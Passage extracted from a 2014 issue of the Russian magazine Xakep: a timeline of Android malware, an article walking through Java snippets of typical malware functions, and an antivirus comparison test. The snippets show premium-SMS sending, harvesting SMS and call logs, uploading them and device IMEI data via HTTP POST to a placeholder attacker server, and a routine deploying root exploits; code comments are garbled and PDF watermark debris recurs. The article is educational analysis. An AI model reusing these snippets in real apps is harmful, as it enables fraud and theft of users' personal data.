Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

183_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

28.5 Mб

Скачать

☆

<<< < Предыдущая 1 23 / 153 4 5 6 7 8 9 10 11 12 13 14 15 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to		ХАКЕР m				04 /183/ 2014	Хронология Android-малвари
w Click						ХАКЕР m				04 /183/ 2014	Хронология Android-малвари
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

В начале года Android-устройства подвергаются заражению вирусом Biggboss. Идея проста: фейковое сообщение от работодателя, перенаправление на сайт, просьба перевести деньги на счет компании.

Весной появился Androways. Этот вирус спамит пользователя Pushуведомлениями о «срочных необходимых обновлениях», заставляя человека дать согласие на установку друзей-вирусов.

Вапреле выходит Uapush, которая показывает рекламу в нотификационной панели.

Май. Pincer. Перехват сообщений с определенных номеров (предназначен для воровства банковских данных).

Виюне количество модификаций SmdSend перевалило за 500. Количество разного рода вирусов-шпионов также растет бешеными темпами.

Виюле создать вирус стало еще проще! Появились утилиты под винду, предназначенные для создания шпионской малвари под Android, — Tool.Raziel

иTool.AndroratTool. С помощью их можно встроить троянца (определенного создателями инструмента) в любое приложение.

Вначале осени обнаружен ботнет, состоящий из 200 тысяч Androidустройств, зараженных вирусом SmsSend. Это стало абсолютным рекордом среди мобильных бот-сетей.

Вэтот же период начинает вредительствовать Fakealert, отображающий сообщения о несуществующих угрозах и требующий внести плату для ее устранения.

Вдекабре появляется WhatsappSpy, который передает на сервер злоумышленников базу сообщений из одноименного мессенджера.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
				to						m
w Click19										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Год начался ярко. В январе появился первый буткит для Android — Oldboot. Вредоносная деятельность у него не отличается от основной массы старших собратьев — выполнение команд от управляющего сервера. Но размещается он в загрузочной области файловой системы, что можно считать грандиозным технологическим прорывом.

ЗАКЛЮЧЕНИЕ

В этой статье я старалась описать


	основные идейные вехи в исто-
	рии мобильной малвари. Лишние
	упоминания о невероятной пло-
	довитости шпионских программ
	и SMS-рассыльщиков здесь опу-
	щены. Как видишь, рассвет тех-
	нической мысли андроид-вирус-
	мейкеров		пришелся на	вторую
	половину 2010 — первую поло-
	вину 2011 года, когда были осво-
	ены основные функции, которые
	можно использовать с выгодой
	для себя: рассылка сообщений,
	сбор информации, рутинг, ими-
	тация	действий пользователя
	в Сети. Творческий расцвет на-
	стал чуть позже, в 2012-м, тогда
	вирусы стали просить пользо-
	вателя	самостоятельно		сделать
	рутинг, чтобы малвари было где
2014	развернуться, чтобы можно было
	спокойно		использовать	Twitter
	API и притвориться прекрасной
	незнакомкой.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

by @ Flickr com

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to		ХАКЕР m				04 /183/ 2014
w Click						ХАКЕР m				04 /183/ 2014
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

Под капотом у Android-малвари

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
				to						m
w Click21										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Под капотом

у Android-малвари

Обзор фрагментов кода самых популярных типов вирусов

В коллекции вредоносных Android-приложений некоторых антивирусных лабораторий содержится уже более 10 миллионов образцов. Эта цифра будоражит воображение, но примерно 9 миллионов 995 тысяч из них — переименованные копии оригинальных вирусов. Но если про-

анализировать исходный код оставшихся нескольких тысяч образцов малвари, то можно заметить, что все они складываются из небольшого количества уникальных функциональных блоков (несколько видоизмененных и по-разному скомбинированных).

Все дело в том, что вирмейкеры чаще всего преследуют весьма тривиальные задачи:

•отправить эсэмэску на платный номер;

•завладеть конфиденциальной информацией пользователя (телефонными номерами, текстами сообщений, данными с SD-карты и так далее);

•собрать данные о зараженном устройстве;

•завладеть администраторскими правами на устройстве (для установки приложений без разрешения владельца или для злонамеренного выведения аппарата из строя);

•отследить логины, пароли и данные платежных карт, которые пользователь вводит на сайтах систем интернет-бан- кинга.

Как они это делают? Попробуем проникнуть в мрачный мир мобильного вирмейкинга и посмотреть, что там происходит.

ОТПРАВКАSMS

Кто использует:

•AdSms;

•FakePlayer;

•HippoSms.

Самым распространенным типом вирусов являются SMSтрояны. Эти вирусы просто отправляют сообщения на платные номера без согласия пользователя. Создать такую программу или переписать готовую под нужный номер совсем легко. Да и процесс получения выгоды предельно упрощен — в отличие, например, от отслеживания банковских данных.

Далее приведен простейший пример кода. Это элементарная функция отправки SMS. Ее можно усложнить проверкой статуса отправки, выбором номеров в зависимости от места положения абонента и последующим удалением SMS.

private static SendSms (String DestNumber,

String SmsText) {

//ǯȢȣȯȦȞȔ țȔȣȧȥȞȔ ȠșȦȢȘȔ sendTextMessage ȢȕȮșȞȦȔ

//SmsManager (ȥȦȔȡȘȔȤȦȡȔȳ ȣȤȢȗȤȔȠȠȔ Șȟȳ ȢȦȣȤȔȖȞȜ

//SMS ȧ ȦșȞȧȭșȗȢ ȧȥȦȤȢȝȥȦȖȔ) ȥ ȠȜȡȜȠȔȟȰȡȯȠ

//ȞȢȟȜȫșȥȦȖȢȠ ȣȔȤȔȠșȦȤȢȖ: ȡȢȠșȤ ȣȢȟȧȫȔȦșȟȳ

//Ȝ ȦșȞȥȦ ȥȢȢȕȭșȡȜȳ

try {

SmsManager.getDefault().sendTextMessage

(DestNumber,null,SmsText,null,null);

return true;

}

ЗАПИСЬПОЛЬЗОВАТЕЛЬСКОЙ ИНФОРМАЦИИВТЕКСТОВЫЙФАЙЛ

	Кто использует:
	•	NickySpy;
Ирина Чернова	•	SmsSpy.

irairache@gmail.com

Существует категория вирусов, которая охотится за персональными данными пользователей. Механизм их действия также несложен. Они либо загружают на сервер своего создателя файлы юзера, либо предварительно собирают какие-либо

řŚś ŞŧŠŖŨŲ ŠŤŚ ŘŞŦũŧŖ

В абсолютном большинстве случаев заражение телефона происходит через установку приложений. Любое приложение для Android существует в виде файла с расширением apk, который, по сути, является архивом. Просмотреть его содержимое можно с помощью Android SDK, конвертера файлов APK в JAR и декомпилятора Java-байт-кода.

Сборка приложения (APK) состоит из следующих частей:

•resources.arsc — таблица ресурсов;

•res (папка) — собственно ресурсы (иконки и прочее);

•META-INF (папка) — содержит файлы со следующим содержимым: контрольные суммы ресурсов, сертификат приложения и описание сборки APK;

•AndroidManifest.xml — всякого рода служебная информация. В том числе разрешения (permission), которые приложение запрашивает перед установкой для своей корректной работы;

•classes.dex — ты наверняка слышал, что в Android операционных системах весь код выполняется с помощью Dalvik virtual machine (начиная с версии 4.4 появляется поддержка ART), которая не понимает обычный Java-байт-код. Поэтому и существуют файлы с расширением dex. В нем, наряду с нужными и полезными классами (которые отвечают за функционал приложения), содержатся также и вредоносные (вирусный код, который мы разбираем в этой статье).

hang

NOW!

BUY

Cover Story

w Click

-xcha

данные в txt (CSV, XML — не принципиально). Интерес для зло-

умышленников могут представлять контакты любого типа, со-

общения из разных мессенджеров, медиафайлы и прочее.

SMS зараженных юзеров особенно ценны номерами теле-

фонов отправителей и получателей — ими можно пополнить

базу для спам-рассылок. Реже вирусы такого рода использу-

ются для заражения устройств конкретных личностей — в сле-

дующий раз, когда твоя девушка предложит тебе протестиро-

вать написанное ей (ай, карамба! — Прим. ред.) приложение

на Android, не теряй бдительности :).

// ǱȫȜȦȔșȠ ȞȢȟȜȫșȥȦȖȢ SMS ȡȔ ȧȥȦȤȢȝȥȦȖș

arrayOfObject = (Object[])localBundle.get("pdus");

int j=arrayOfObject.length;

// ǮȕȩȢȘȜȠ ȣȢ ȪȜȞȟȧ ȞȔȚȘȧȲ SMS

i=1

while (true)

{

if(i>=j)

break;

// ǱȢțȘȔșȠ ȢȕȮșȞȦ SMS-ȥȢȢȕȭșȡȜș

SmsMessage localSmsMessage=SmsMessage.

createFrompdu((byte[])arrayOfObject[i]);

// ǪȟȔȘșȠ Ȗ ȥȦȤȢȞȢȖȯș ȣșȤșȠșȡȡȯș ȡȢȠșȤ

// ȢȦȣȤȔȖȜȦșȟȳ, ȦșȞȥȦ Ȝ ȖȤșȠȳ ȢȦȣȤȔȖȞȜ SMS

Отправка эсэмэски

String MessageNumber = localSmsMessage.

getOriginatingAddress();

String MessageText = localSmsMessage.

getDisplayMessageBody();

long l= localSmsMessage.getTimestampMillis();

Date localDate=new Date(l);

String MessageTimeDate = new

SimpleDateFormat("yyyy-MM-dd HH:mm:ss").

format(localDate);

// ǴȢȤȠȜȤȧșȠ Ȝț ȣȢȟȧȫșȡȡȯȩ ȘȔȡȡȯȩ ȥȦȤȢȞȧ

// Ȝ țȔȣȜȥȯȖȔșȠ șș Ȗ ȦșȞȥȦȢȖȯȝ ȨȔȝȟ

// ȣȢȟȰțȢȖȔȦșȟȰȥȞȜȠ ȠșȦȢȘȢȠ WriteRec

String MessageInfo= 7MessageNumber+"#"+

MessageText+"#"+ MessageTimeDate+";"

WriteRec(paramContext,"sms.txt",MessageInfo);

// ǯșȤșȩȢȘȜȠ Ȟ ȥȟșȘȧȲȭșȠȧ ȥȢȢȕȭșȡȜȲ

i+=1;

}

Также спам-лист удобно пополнять из истории вызовов абонента. Вот такой код может запускаться при входящем звонке:

If (parmIntent.getAction().equals("android.

intent.action.NEW_OUTGOING_CALL")) {

// ǪȟȔȘșȠ Ȗ ȣșȤșȠșȡȡȧȲ ȡȢȠșȤ ȔȕȢȡșȡȦȔ

String phonenumber=paramIntent.

getStringExtra("android.intent.extra.

PHONE_NUMBER");

// ǴȢȤȠȜȤȧșȠ ȥȦȤȢȞȧ Ȝț ȡȢȠșȤȔ Ȝ ȘȔȦȯ țȖȢȡȞȔ

String PhoneCallRecord= phonenumber +"#"+

getSystemTime();

// ǢȯțȯȖȔșȠ ȠșȦȢȘ WriteRec() (șȗȢ ȞȢȘ țȘșȥȰ

// ȡș ȣȤȜȖȢȘȜȦȥȳ), ȞȢȦȢȤȯȝ ȘȢȕȔȖȟȳșȦ ȥȦȤȢȞȧ

// Ȗ ȦșȞȥȦȢȖȯȝ ȨȔȝȟ ȥ ȜȥȦȢȤȜșȝ țȖȢȡȞȢȖ

WriteRec(paramContext,"phonecall.txt",

PhoneCallRecord);

}

После того как информация записана, она переправляется в «нужные руки». Приведенный ниже код загружает историю звонков на сервер:

SMS зараженных юзеров особенно ценны номерами телефонов отправителей и получателей — ими можно пополнить базу для спам-рассылок

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
ХАКЕР 04 /183/ 2014
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

private void uploadPhonecallHistory()

throws IDException

{

while(true)

{

return;

// ǯȤȢȖșȤȳșȠ, șȥȦȰ ȟȜ ȡȧȚȡȯȝ ȡȔȠ ȨȔȝȟ

if(!ﬁleIsExists(/data/data/spyapp.pg/ﬁles/

phonecall.txt"))

continue;

// ǱȢțȘȔșȠ ȢȕȮșȞȦ — țȔȗȤȧțȫȜȞ ȨȔȝȟȢȖ

UploadFiles localUploadFiles=new UploadFiles();

String uploadkeynode=getKeyNode("uid","uid_v");

//ǧȔȣȧȥȞȔșȠ ȠșȦȢȘ .advanceduploadﬁle (șȗȢ ȞȢȘ

//țȘșȥȰ ȡș ȣȤȜȖȢȘȜȦȥȳ) Șȟȳ țȔȗȤȧțȞȜ ȨȔȝȟȔ

//ȡȔ ȥșȤȖșȤ "ȖȜȤȧȥȠșȝȞșȤȔ" localUploadFiles.advanceduploadﬁle

(uploadkeynode,"/data/data/spyapp.pg/ﬁles/

phonecall.txt");

}

СБОРИНФОРМАЦИИ

Кто использует:

•DroidKungFu;

•DroidDream;

•подавляющее большинство аналогичной малвари.

Впринципе, любому вирусмейкеру полезна информация о зараженных его программами устройствах. Получить ее очень просто. Создается массив с данными о свойствах телефона (их полный список можно посмотреть в руководстве Androidразработчика) и отправляется POST-запросом к PHP-скрипту (язык непринципиален) на сервере злоумышленника, тот обрабатывает данные и помещает их в базу данных для последующего использования.

private void reportState(int paramInt, string

paramString) {

//ǱȢțȘȔșȠ ȠȔȥȥȜȖ Ȝ ȞȟȔȘșȠ Ȗ ȡșȗȢ ȥȟȧȚșȕȡȧȲ

//ȜȡȨȢȤȠȔȪȜȲ

ArrayList UserInformation=new ArrayList();

UserInformation.add(new

BasicNameValuePair("imei", this.mImei));

UserInformation.add(new

BasicNameValuePair("taskid", this.mTaskId));

UserInformation.add(new

BasicNameValuePair("state", Integer.

toString(paramInt)));

//ǥȥȟȜ ȧ ȨȧȡȞȪȜȜ ȢȣȤșȘșȟșȡ ȣȔȤȔȠșȦȤ "param-

//String(ȞȢȠȠșȡȦȔȤȜȝ)", ȞȟȔȘșȠ Ȗ ȠȔȥȥȜȖ Ȝ șȗȢ

if(paramStrng !=null)&&(!"".equals

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to		ХАКЕР m				04 /183/ 2014	Под капотом у Android-малвари
w Click						ХАКЕР m				04 /183/ 2014	Под капотом у Android-малвари
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

(paramString)))UserInformation.add(new

BasicNameValuePair("comment", paramString));

	// ǱȢțȘȔșȠ HTTP POST țȔȣȤȢȥ ȥ ȔȘȤșȥȢȠ ȥȞȤȜȣȦȔ,
	// ȞȢȦȢȤȯȝ ȢȥȧȭșȥȦȖȟȳșȦ ȥȕȢȤ ȘȔȡȡȯȩ
	HttpPost localHttpPost = new HttpPost("http://	WARNING
	search.virusxxxdomain.com:8511/search/rtpy.php");	WARNING
	try {
	// ǤȢȕȔȖȟȳșȠ Ȗ țȔȣȤȢȥ ȡȔȬ ȠȔȥȥȜȖ ȥ ȘȔȡȡȯȠȜ	Весь код, представлен-
	// Ȝ ȖȯȣȢȟȡȳșȠ șȗȢ ȥ ȣȢȠȢȭȰȲ ȥȦȔȡȘȔȤȦȡȢȗȢ	ный в статье, предна-
	// HTTP-ȞȟȜșȡȦȔ	значен исключительно
	localHttpPost.setEntity(new UrlEncodeForm	для самообразования
	Entity(UserInformation, "UTF-8")));	и совершенствования на-
	new DefaultHttpClient().execute	выков защиты от вирусов
	(localHttpPost).getStatusLine.getStatusCode();	у наших читателей. Код
	return;	понятен, но не вре-
	}	доносен и напрямую
}		не скомпилируется, по-
РУТИНГ		этому не стоит обвинять
РУТИНГ		нас в распространении
Кто использует:		малвари :).
•	DroidKungFu;
•	DroidDream;
•	RootSmart.

Одна из самых неприятных вещей, которая может произойти с Android-устройством, — это его рутинг вирусом. Ведь после этого зловредная программа может делать с ним что угодно: устанавливать другие вирусы, менять настройки аппаратного обеспечения. Совершается это действо путем последовательного запуска эксплойтов:

private void RootFunc() {

ApplicationInfo localApplicationInfo

=getApplicationInfo();

/*"ratc" — ȱȦȢ ȞȢȣȜȳ țȡȔȠșȡȜȦȢȗȢ root-ȱȞȥȣȟȢȝȦȔ

Rage Against The Cage.

Kiall — ȢȥȦȔȡȢȖȞȔ Ȗȥșȩ ȣȤȢȪșȥȥȢȖ, țȔȣȧȭșȡȡȯȩ

ȦșȞȧȭȜȠ ȣȤȜȟȢȚșȡȜșȠ.

Gjsvro — ȱȞȥȣȟȢȝȦ Șȟȳ ȣȤȜȢȕȤșȦșȡȜȳ ȣȤȔȖ udev

(ȜȥȣȢȟȰțȧȲȦȥȳ Ȗ Linux-ȥȜȥȦșȠȔȩ

Șȟȳ ȤȔȥȬȜȤșȡȡȢȝ ȤȔȕȢȦȯ ȥ ȔȣȣȔȤȔȦȡȯȠ

ȢȕșȥȣșȫșȡȜșȠ Ȝ ȥșȦșȖȯȠȜ ȜȡȦșȤȨșȝȥȔȠȜ).

Ǣȥș ȱȦȢ ȞȢȣȜȤȧșȠ Ȗ ȡȧȚȡȢș ȠșȥȦȢ

Utils.copyAssets(this,"ratc","/data/

data"+localApplicationInfo.packageName + "/ratc");

Utils.copyAssets(this,"killall","/data/

data"+localApplicationInfo.packageName +

"/killall");

Utils.copyAssets(this,"gjsvro","/data/

data"+localApplicationInfo.packageName +

"/gjsvro");

// Ǩ țȔȣȧȥȞȔșȠ ȥ ȣȢȠȢȭȰȲ ȞȢȠȔȡȘȡȢȝ ȥȦȤȢȞȜ

Utils.oldrun("/system/bin/chmod", "4755 /data/

data"+localApplicationInfo.packageName + "/ratc");

Utils.oldrun("/system/bin/chmod", "4755 /data/

data"+localApplicationInfo.packageName +

"/killall");

Utils.oldrun("/system/bin/chmod", "4755 /data/

data"+localApplicationInfo.packageName +

"/gjsvro");

new MyTread.start();

}

ЗАКЛЮЧЕНИЕ

Как мы видим из примеров, мобильный вирмейкинг технологической сложностью не отличается. Конечно, данные примеры упрощены под формат журнала — прежде всего, упущены обработчики ошибок и исключений, а также отдельные технические мелочи, отсутствие которых не помешает тебе понять принципы работы Android-малвари, но оградит от ненужных экспериментов. Ведь мы не поддерживаем создание вирусов, не так ли? :)

					hang		e
				C			e	E
			X					E
		-							d
	F									t
	D									i
	D									r
P							NOW!			o
P
						BUY
					to	BUY
w					to						m
w		23Click									m
w
	w									o
		.							.c
			p					g
				df			n		e
					-x cha

ŧŖşŨű Ť ŢŤŗŞšŲţŤş ŢŖšŘŖŦŞ

Блог экспертов компании

Kaspersky Lab securelist.com/en/blog?cat=6

Этот ресурс содержит качественные и подробные статьи о многих аспектах компьютерной безопасности, в том числе и об Android-вирусах. Стоит регулярно посещать этот сайт, чтобы быть в курсе последних событий.

Androguard Google Group https://code.google.com/p/androguard

Группа посвящена open source инструменту

для всевозможных манипуляций с кодом Androidприложений (декомпиляция и модификация DEX/ ODEX/APK-файлов и так далее). Androguard также содержит обширную базу статей про вирусы. Помимо кратких обзоров функционала и методов защиты, встречаются подробные анализы кода малвари.

Androguard Google Group

Раздел Mobile Threats на www.fortiguard.com fortiguard.com/antivirus/mobile_threats.html

Энциклопедия телефонных вирусов. Каждая статья — обзор функционала, приправленный значительным количеством технических деталей. Помимо информации об угрозах для операционной системы Android, есть статьи и про вирусы для Symbian OS, iOS и других платформ.

ŝŖůŞŨŖ ŤŨ ŘŞŦũŧŤŘ

Некоторые пользователи считают, что если скачивать приложения исключительно из Google Play и установить на смартфон антивирус, то это стопроцентно гарантирует безопасность. Не стоит обольщаться: в Сети регулярно появляются сообщения о нахождении малвари в официальном маркете. А количество вновь появившихся зловредных программ измеряется сотнями тысяч в месяц, что затрудняет их своевременное попадание в базы антивирусных программ.

Реальную гарантию безопасности может дать ручной просмотр кода APK-файла перед установкой его на телефон. Не нужно быть гуру кодинга, чтобы заметить вредоносные фрагменты. А наша статья поможет тебе в этом.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

City off Boston Archives @ Flickr.com

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to		ХАКЕР m				04 /183/ 2014	][-тестирование
w Click						ХАКЕР m				04 /183/ 2014	][-тестирование
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

][-тестирование

Антивирусы для Android

Мобильные устройства стремятся перегнать настольные тачки не только по вычислительным возможностям и продажам, но и по количеству написанной под них малвари. Смешно, но по числу вирусов лидирует отнюдь не мобильная ОС от Microsoft, а совсем даже наоборот — Android с ее Linux-ядром...

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
				to						m
w25Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Ирина Чернова irairache@gmail.com

Сегодня мы подготовили для тебя тестирование пяти популярных		Подготовкактестированию
антивирусов (каждым из них во всем мире пользуются более 50		Найдено пять APK-файлов, зараженных перечисленными
миллионов человек). Помимо теста на нахождение вредоносных		вирусами (источники: форумы о безопасности мобильных
программ, мы приведем обзор самых интересных фич сравнивае-		устройств).
мых приложений.		• Копия каждой сборки проверена на наличие адекватного
КАКПРОХОДИЛТЕСТ		заявленному вирусу вредоносного кода с помощью dex2jar	WARNING
КАКПРОХОДИЛТЕСТ		и JD-GUI (в случае с Obad проверялось наличие характер-	WARNING
Итак, в тесте принимали участие пять антивирусных программ:		ной обфускации).	Будь осторожен с обнов-
•	Dr.Web v.9 Life;	• Исходные названия сборок изменены на нейтральные.	Будь осторожен с обнов-
•	Kaspersky Internet Security;	• Сборки загружены на сервер (для ускорения их установки	лением операционной
• Mobile Security & Antivirus (Avast Software);		на телефон).	системы на смартфоне
•	360 Mobile Security;	• Проведена перепрошивка планшета.	с установленным анти-
•	Lookout Mobile Security.	• В устройство вставлена симка, на которой установлена бло-	вирусом. Тебя может
		кировка исходящих вызовов и SMS провайдером и удалена	ждать непредставимый
	Наш тестовый стенд:	вся личная информация.	по своим последствиям
• Samsung Galaxy Tab 2 7.0 P3100;		Порядокпроведениятеста	факап :). Лучше снести
• версия прошивки Android: P3100XXDMC2.		Порядокпроведениятеста	антивирус, обновить
		• На планшет загружались все сборки, принимающие участие	систему и поставить его
	Вирусы, которые требовалось обнаружить:	в тесте (инсталляция приложений не производилась).	заново.
•	Svpeng;	• После этого устанавливался проверяемый антивирус.
•	Opfake;	• Запускалось сканирование системы.
•	Obad;	• Подсчитывались выявленные угрозы.
•	BadNews;	• Деинсталлировался изучаемый антивирус, и удалялись
•	Kaneot.	файлы с малварью.

ANDROID-ŪŖşŦŘŤšű	ŤŗŪũŧŠŖŬŞŵŘŞŦũŧţŤřŤŠŤŚŖ
Помимо классических антивирусных программ, содержащих в себе полный	Упомянутый в статье троянец Obad использовал для усложнения разбора
комплекс средств защиты, в Google Play также доступны межсетевые экраны	своих исходников две уязвимости: декомпилятора dex2jar и Android OC
для телефонов и планшетов: Android Firewall, DroidWall, AFWall, MobiWall	(позволяющую скрывать наличие администраторских прав у приложения).
и еще несколько десятков приложений. Абсолютное большинство из них	На данный момент они уже устранены.
корректно работают только на устройствах, прошедших процедуру рутинга.		Cоздатели Android-приложений, желающие защитить свой код от заим-
Судя по отзывам пользователей, основная масса людей использует такие	ствования недобросовестными людьми, могут воспользоваться следующи-
программы для блокировки рекламы в играх. О каждом популярном файрво-	ми инструментами:
ле, представленном в Google Play, написано весомое количество негативных	•	Stringer Java Obfuscator (https://jfxstore.com/);
отзывов. Основные жалобы — «не дает корректно работать другим приложе-	• DexProtector (dexprotector.com/ru/);
ниям», «пропускает рекламу и замедляет работу системы».	•	Allatori (www.allatori.com/features/android-obfuscation.html).

hang

NOW!

BUY

CLOUD MESSAGINGCover Story

w Click

GOOGLEm

-xcha

Ранее называлась C2DM (Android Cloud to Device Messaging). Служба для от-

правки данных с сервера в приложения. Доступна разработчикам, получившим специальный API-ключ. Максимальный размер одного сообщения — 4 Кб.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
ХАКЕР 04 /183/ 2014
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Обзорисследованныхвирусов

Svpeng

Этот вирус появился в начале 2013 года. Предназначен для воровства денег с банковских счетов пользователей. Типичная модификация вируса производит следующие действия:

•обменивается с управляющим сервером данными

1об устройстве (прежде всего злоумышленников интересуют входящие SMS);

•отправляет SMS со словом BALANCE на номер 900 («Сбер- банк-онлайн»);

•если у пользователя есть деньги на счете, то отправляет SMS типа «8916*** 30» на все тот же короткий номер. Таким образом, небольшая сумма денег с банковского счета пострадавшего кладется на счет мобильного телефона участника аферы;

•мониторит входящие SMS и перенаправляет всю информацию, полученную с номера 900, на управляющий сервер.

	Opfake

	Многофункциональный и очень популярный SMS-троянец.
2	Известен с начала 2012 года. Количество зараженных им
	устройств измеряется десятками миллионов. Вот неполный
	список того, что он умеет:
	• рассылать сообщения на платные номера;
	• рассылать по номерам адресной книги пользователя вре-
		доносные ссылки;
	• читать и удалять входящие SMS;
	•	взаимодействовать с Google Cloud Messaging (для получе-
		ния обновленных текстов SMS для рассылки и подобного);
	• самообновляться (переименовываться и вносить измене-
		ния в собственный исходный код).

3		BadNews
		BadNews
		Впервые был обнаружен в Google Play в качестве приложения
		для пользования фальшивой рекламной сетью. Случилось это
		весной 2013 года. По сути — SMS-троянец, который может
		отправлять пользователям фальшивые сообщения из Skype,
		Facebook и прочих популярных сервисов, таким образом про-
		воцируя установку других вирусов.
		воцируя установку других вирусов.

	Obad
	Obad
	Самый сложный мобильный троянец 2013 года. Отличается
	высококлассными шифрованием (основанным на уязвимо-
	сти в dex2jar) и обфускацией кода. Также примечателен тем,
4	что для самораспространения может пользоваться ботнетами
	других троянов (в основном Opfake и схожих с ним). Вот не-
	которые его умения:
	• рутинг устройства без ведома пользователя;
	• мониторинг сообщений и выполнение определенных
	команд в зависимости от их содержания (также у злоумыш-
	ленников есть возможность управлять троянцем с помо-
	щью SMS!);
	• передача зараженных файлов всем доступным Bluetooth-
	устройствам;
	• выполнение консольных команд, получаемых с сервера
	злоумышленников.

5	Kaneot
	Kaneot
	Также появился в 2013 году. Маскировался под сборник анек-
	дотов. Вот что он делает:
	• проверяет наличие установленных антивирусов и замора-
		живает свою активность в определенных случаях;
	• если дан зеленый свет, предлагает установить
		GoogleUpdates_4.0.0.1 с помощью PUSH-уведомления;
	•	в случае согласия пользователя на обновления гугла
	•	внедряет в систему троян, отправляющий SMS на преми-
		ум-номера.
		ум-номера.

Нашиантивирусы

Dr.WebLifev.9

Компания Dr.Web еще в 2010-м выпустила на российский рынок Android-антивирус. APK-файл весит всего 2,48 Мб (для планшета Galaxy Tab). Количество установок текущей версии измеряется в десятках миллионов (для Light-версии). Мини-обзор функционала Dr.Web:

•сканирование системы целиком или отдельных директорий по запросу юзера;

•монитор SpIDer Guard, запускающийся при сохранении чего-либо на устройстве;

•защита карты памяти от заражения вирусами, которые опасны для десктопных компьютеров;

•защита от спам-SMS и нежелательных звонков;

•антивор (блокировка телефона в случае кражи);

•родительский контроль.

KasperskyInternetSecurity

В2011 году «Лаборатория Касперского» предста-

вила Kaspersky Mobile Security в Android-маркете.

Втечение нескольких лет до этого продукт был доступен для Windows Mobile и Symbian. Приложение имеет много полезных дополнений (помимо защиты от малвари):

• блокировка опасных сайтов (защита от интер- нет-мошенничества);

• антивор: функция «Сирена» (даже если звук на телефоне отключен, врубает специфический звуковой сигнал на полную громкость), отображение местоположения устройства на Google Maps, блокировка украденного телефона и, что особо радует, возможность

сфотографировать похитителя, когда он пытается разблокировать телефон;

• защита от SMS-спама + черный список;

• родительский контроль.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to		ХАКЕР m				04 /183/ 2014
w Click						ХАКЕР m				04 /183/ 2014
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

][-тестирование

					hang		e
				C			e	E
			X					E
		-							d
	F									t
	D									i
	D									r
P							NOW!			o
P
						BUY
					to	BUY
w					to						m
w		27Click									m
w
	w									o
		.							.c
			p					g
				df			n		e
					-x cha


MobileSecurity&Antivirus(Avast	360MobileSecurity	LookoutMobileSecurity
Software)	У этого антивируса, представленного разработ-	Компания, которая занимается разработкой
Продукт всемирно известной чешской компании	чиком Qihu 360 Software Co, несколько десятков	и распространением этого продукта, активно
с 25-летней историей. Появился на рынке в дека-	миллионов пользователей по всему миру. Интер-	сотрудничает с Samsung с октября 2013 года.
бре 2011-го. Имеет бесплатную и премиум-вер-	фейс предельно упрощен (на глаз и по отзывам	В ближайшее время Lookout будет заботить-
сию. Число установок первой перевалило за 50	пользователей, он опережает по этому показате-	ся о безопасности телефонов, произведенных
миллионов. Вот основные фичи антивируса:	лю Dr.Web), и функционал довольно минимали-	этой корейской компанией. Это лишь увеличит
• поиск утерянного телефона по GPS и антивор;	стичен, хотя и включает в себя кое-что интерес-	и без того огромную (более 50 миллионов) ауди-
• счетчик трафика и диспетчер приложений;	ное:	торию антивируса. Вот его основные фишки:
• брандмауэр (включается после рутинга);	• облачное сканирование;	• антивор с поиском устройства и сиреной;
• фильтр входящих вызовов и сообщений;	• сканер уязвимостей устройства;	• если пользователь спьяну пять раз подряд не-
• резервное копирование данных;	• консультант по защите (предоставление ин-	правильно введет пароль от своего телефона,
• защита приложений PIN-кодом;	формации о том, как установленные прило-	то с утра, проверяя емейл, он обнаружит там
• геофенсинг. Пример: программирование	жения взаимодействуют с персональными	фотографию своего лица;
на телефоне ребенка отправки SMS на номер	данными).	• резервное копирование данных и перенос
родителя, если устройство покинуло пределы		на новое устройство.
определенной зоны (дом, школа, детский сад).

Результатытеста	Svpeng	Opfake	Obad	BadNews Kaneot
Dr.Web v.9 Life
Kaspersky Internet Security
